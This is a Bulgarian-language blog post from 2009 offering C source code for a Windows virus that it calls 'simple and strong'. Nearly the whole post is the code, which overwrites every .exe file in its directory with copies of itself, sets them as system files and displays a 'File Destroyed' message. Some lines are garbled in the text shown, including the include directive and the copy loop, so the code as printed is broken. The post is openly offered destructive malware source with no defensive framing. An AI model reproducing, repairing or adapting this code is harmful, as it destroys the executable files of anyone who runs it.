петък, 13 ноември 2009 г.

Win32.PE File Overwritter



Това е прост и як вирус който презаписва всички .еxe файлове в директорията в която се намира с свои собствени копия :)

#include windows.h

int FixSize(int BytesToAdd, HANDLE FileHandle);
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize);
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize);
int OpenVirus(char FileName[] , HANDLE *OpenHandle);
int main()
{
char FileMask[] = "*.exe",FilePath[MAX_PATH],Payload[]="File Destroyed By .ExE Destroyer",Title[] = ".ExE Destroyer";
HANDLE FileFindHandle,NextHandle = 1,FileOpenHandle,VirusHandle;
WIN32_FIND_DATA FindData;
int FileSize,VirusSize;

GetModuleFileName(NULL,FilePath,MAX_PATH);
VirusSize = OpenVirus(FilePath,&VirusHandle);

FileFindHandle = FindFirstFile(FileMask,&FindData);
FindFiles:
if(NextHandle == 0) { goto Finish; }
if(FindData.dwFileAttributes == FILE_ATTRIBUTE_SYSTEM) {
FindNextFile:
NextHandle = FindNextFile(FileFindHandle,&FindData);
goto FindFiles;
}

FileSize = OpenFileToInfect(FindData.cFileName,&FileOpenHandle,VirusSize);

Infect(FileOpenHandle,VirusHandle,VirusSize);
FlushViewOfFile(FileOpenHandle,VirusSize);

SetFileAttributes(FindData.cFileName,FILE_ATTRIBUTE_SYSTEM);

goto FindNextFile;

Finish:

MessageBox(0,Payload,Title,MB_ICONERROR);
return 0;
}

int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize) {
int Size;

*OpenHandle = CreateFile(FileName,GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);

if(VirusSize > Size) { FixSize((VirusSize-Size),*OpenHandle); }
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_EXECUTE_READWRITE,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_ALL_ACCESS,0,0,0);

return Size;
}

int OpenVirus(char FileName[] , HANDLE *OpenHandle) {
int Size;

*OpenHandle = CreateFile(FileName,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL );

Size = GetFileSize(*OpenHandle,NULL);

*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_READONLY,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_READ,0,0,0);

return Size;
}

int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize) {
int i;
for(i = 0;i*FileHandle = *VirusHandle;
FileHandle++;
VirusHandle++;
}
return 0;
}

int FixSize(int BytesToAdd,HANDLE FileHandle) {

DWORD BytesWritten = 0;
char Buffer[BytesToAdd];

SetFilePointer(FileHandle,0,0,FILE_END);
WriteFile(FileHandle,Buffer,BytesToAdd,&BytesWritten,NULL);

return 0;
}
Публикувано от в

Няма коментари:

Публикуване на коментар

Абонамент за: Коментари за публикацията (Atom)